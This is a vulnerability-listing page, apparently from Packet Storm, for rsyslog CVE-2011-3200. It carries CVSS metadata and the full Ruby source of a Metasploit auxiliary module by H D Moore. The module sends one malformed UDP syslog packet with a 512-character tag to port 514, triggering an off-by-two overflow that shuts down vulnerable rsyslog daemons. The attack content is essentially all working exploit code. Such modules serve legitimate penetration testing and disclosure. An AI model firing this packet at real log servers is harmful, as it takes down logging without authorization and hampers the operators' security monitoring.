rsyslog Long Tag Off-By-Two Denial of Service

2024-08-3100:00:00

H D Moore, metasploit.com

packetstormsecurity.com

rsyslog

long tag

off-by-two

dos

overflow

remote log

shutdown

cve-2011-3200

url

disclosure date

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

6.9

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Udp  
include Msf::Auxiliary::Dos  
  
def initialize  
super(  
'Name' => 'rsyslog Long Tag Off-By-Two DoS',  
'Description' => %q{  
This module triggers an off-by-two overflow in the  
rsyslog daemon. This flaw is unlikely to yield code execution  
but is effective at shutting down a remote log daemon. This bug  
was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.  
Compiler differences may prevent this bug from causing any  
noticeable result on many systems (RHEL6 is affected).  
},  
'Author' => 'hdm',  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2011-3200'],  
[ 'URL', 'https://www.rsyslog.com/potential-dos-with-malformed-tag/' ],  
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=727644' ],  
],  
'DisclosureDate' => 'Sep 01 2011')  
  
register_options(  
[  
Opt::RPORT(514)  
])  
end  
  
def run  
connect_udp  
pkt = "<174>" + ("#" * 512) + ":"  
print_status("Sending message containing a malformed RFC3164 tag to #{rhost}")  
udp_sock.put(pkt)  
disconnect_udp  
end  
end  
`